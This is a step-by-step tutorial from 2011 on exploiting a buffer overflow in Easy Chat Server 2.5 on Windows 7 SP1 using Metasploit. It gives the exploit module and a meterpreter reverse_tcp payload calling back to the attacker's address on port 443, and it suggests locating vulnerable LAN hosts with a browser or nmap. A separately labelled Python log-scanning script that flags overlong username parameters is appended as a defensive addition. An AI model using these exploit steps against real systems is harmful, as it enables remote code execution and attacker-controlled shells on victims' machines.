Type : Tutorial
Level : Easy, Medium
Victim O.S : Windows 7 SP1
Victim Vulnerable Application : Easy Chat Server 2.5
Attacker O.S : Backtrack 5 R1
Here is another application that can be exploited because of a vulnerability in it. In this tutorial we will learn and try how to exploit Windows 7 SP1 through Easy Chat Server v2.5. At the time I wrote this tutorial the vulnerability was still zero-day: there was no fix or update from the official website.
According to the Metasploit description of this exploit module:
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending an overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to "C:\Program Files\Easy Chat Server", is concatenated with "\users\" and the string passed as the username HTTP parameter.
Without further talk, let's try how to exploit this application.
Victim IP Address : 192.168.8.94
Attacker IP Address : 192.168.8.91
2. Easy Chat Server 2.5 (download from mediafire.com)
1. Prepare your Metasploit console by typing the msfconsole command. You can also use Metasploit through its GUI, but if you use both often you will notice a big difference, and you will realize that the console is much faster and quicker.
2. The next step is to select and use the proper exploit module for this attack (see picture below).
use exploit/windows/http/efs_easychatserver_username
set payload windows/meterpreter/reverse_tcp
Q : How do you know that someone is using this Easy Chat Server?
A : You have to find out. Usually this application runs on a LAN, and by entering the host's IP address in a browser you will see whether it runs this application or not. nmap can also help you get more details.
Information :
set rhost 192.168.8.94 --> set the address of the victim IP
set lhost 192.168.8.91 --> your local address / attacker IP address
set lport 443 --> attacker port to receive / handle the payload
4. After everything is set up correctly, perform the attack by typing the exploit command.
1. As of the day I write this tutorial (Sept 4, 2011), there is no countermeasure for this vulnerability, but you can use a personal firewall to minimize the possibility of an attack.
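Since no fix existed at the time, a detection check is the other practical mitigation besides a firewall. The following is an added example, not part of the original tutorial or of Metasploit: it scans constructed web-server-style log lines for authentication requests whose username parameter is abnormally long, which is the trigger condition the module description gives. The request path, log format and length threshold are assumptions, not Easy Chat Server's real values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Threshold for an abnormally long username; ordinary chat nicknames are short.
# This value is an assumption chosen for the example, not a figure from the tutorial.
MAX_USERNAME_LEN = 64

# Constructed sample log lines in common access-log style. The request path
# and parameter name are assumptions, not Easy Chat Server's real ones.
SAMPLE_LOG = """\
192.168.8.91 - - [04/Sep/2011:10:00:01 +0000] "GET /login?username=alice&password=x HTTP/1.1" 200 512
192.168.8.91 - - [04/Sep/2011:10:00:02 +0000] "GET /login?username={long}&password=x HTTP/1.1" 200 512
192.168.8.50 - - [04/Sep/2011:10:00:03 +0000] "GET /index.htm HTTP/1.1" 200 2048
""".format(long="A" * 300)

# source host, timestamp, method and request target of an access-log line
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def find_long_usernames(log_text, max_len=MAX_USERNAME_LEN):
    """Return (source_ip, timestamp, username_length) for every request whose
    'username' query parameter is longer than max_len characters."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        query = urlsplit(m.group("target")).query
        # parse_qs gives a list of values per key; match the key case-insensitively
        params = parse_qs(query, keep_blank_values=True)
        for key, values in params.items():
            if key.lower() != "username":
                continue
            for value in values:
                if len(value) > max_len:
                    hits.append((m.group("src"), m.group("ts"), len(value)))
    return hits


if __name__ == "__main__":
    for src, ts, n in find_long_usernames(SAMPLE_LOG):
        print(f"ALERT {ts} {src} username length {n} exceeds {MAX_USERNAME_LEN}")
```

Feed the function your real server or proxy log instead of SAMPLE_LOG; a hit from a LAN host is worth blocking at the personal firewall mentioned above.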
Hope you enjoyed 🙂